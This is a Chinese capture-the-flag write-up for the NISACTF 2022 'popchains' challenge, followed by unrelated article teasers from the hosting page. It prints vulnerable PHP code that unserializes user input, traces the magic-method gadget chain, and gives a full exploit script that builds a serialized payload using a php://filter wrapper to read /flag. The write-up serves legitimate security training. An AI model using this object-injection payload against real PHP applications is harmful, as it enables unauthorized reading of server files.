NSS [NISACTF 2022]popchains

简介: NSS [NISACTF 2022]popchains

NSS [NISACTF 2022]popchains

先看看题目,源码如下。

<?php
echo 'Happy New Year~ MAKE A WISH<br>';

if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);        //@为了不报错
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}

class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}

服务器反序列化Road_is_Long—>Road_is_Long::wakeup()—>Road_is_Long::toString()–>Make_a_Change::get()—>Try_Work_Hard::invoke()—>Try_Work_Hard::append()

exp:
<?php
class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var="php://filter/read=convert.base64-encode/resource=/flag";  //protected不能从外面赋值
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}



$road1 = new Road_is_Long();   
$road2 = new Road_is_Long();   
$try = new Try_Work_Hard();
$make = new Make_a_Change();
 
$road1->page = $road2;
$road2->string=$make;
$make->effort=$try;


$jay17 = serialize($road1);
echo urlencode($jay17);

目录
相关文章
|
机器学习/深度学习 存储 人工智能
ONNX 与安全:保护模型免受攻击
【8月更文第27天】随着人工智能和机器学习模型的应用越来越广泛,模型的安全性也成为了人们关注的重点。Open Neural Network Exchange (ONNX) 作为一种开放的标准格式,不仅可以促进不同框架之间的模型共享,还面临着如何保护模型不被恶意攻击的风险。本文将探讨 ONNX 在模型安全方面的考虑,以及如何利用 ONNX 和其他技术来保护模型免受攻击。
638 4
|
10月前
|
JavaScript 算法 前端开发
为什么npm run serve正常,npm run build就报错:digital envelope routines::unsupported
通过本文的分析,我们详细介绍了 `npm run serve`正常但 `npm run build`时报错:`digital envelope routines::unsupported`的原因及解决方案。主要从检查Node.js版本、更新依赖、检查依赖库、配置文件及环境变量等方面进行了深入探讨。希望本文能帮助开发者解决这一问题,确保项目顺利构建和部署。
975 6
|
存储 域名解析 网络协议
在Linux中,/usr和/etc目录的用途有什么?
在Linux中,/usr和/etc目录的用途有什么?
|
数据库
TCC+ SAGA事务
【8月更文挑战第12天】
102 0
|
PyTorch 算法框架/工具
ImportError: cannot import name ‘_DataLoaderIter‘ from ‘torch.utils.data.dataloader‘
ImportError: cannot import name ‘_DataLoaderIter‘ from ‘torch.utils.data.dataloader‘
294 2
|
人工智能 安全 Java
Java8 - LocalDateTime时间日期类使用详解
Java8 - LocalDateTime时间日期类使用详解
|
SQL Web App开发 网络安全
渗透测试-浏览器插件-Hackbar的安装与使用教程
渗透测试-浏览器插件-Hackbar的安装与使用教程
渗透测试-浏览器插件-Hackbar的安装与使用教程
|
机器学习/深度学习 人工智能 分布式计算
基于组合优化的3D家居布局生成看千禧七大数学难题之NP问题
基于组合优化的3D家居布局生成看千禧七大数学难题之NP问题
265 1
|
人工智能 自然语言处理 算法
赶紧学大模型!再不学连对象都找不到了。。。
这次云栖大会的几个笑点之一了,我认为这也能带来一些思考,根据量子位的调研看目前AI大模型工程师的缺口确实很大,这也很可能是计算机行业的下一个风口了。
|
消息中间件 架构师 Dubbo
疯狂吊打阿里P8架构师的Java面试笔记,在脉脉狂收offer
开场先来带大家看一组数据 行业风向标,猎聘发布的数据报告显示: 相比以往,2023年企业招聘两大变化体现在:对人才各方面能力要求更高、对人岗的匹配性要求更细。 不同规模的企业用人各有侧重,大中型企业更注重人的全面能力,小型企业更在意人岗匹配的精细度。 行业风向标,猎聘发布的数据报告显示: 对于新一年的就业形势,上述报告显示,84.48%的职场人对2023年的就业形势有信心,人群越年轻信心越足,90后中有信心的人最多,占到该群体的87.10%。 职场人有信心的两大主要原因是“疫情管控放开,就业市场有望释放更多职位” ,“经济形势好转,就业大环境变好”,得票率均超70%。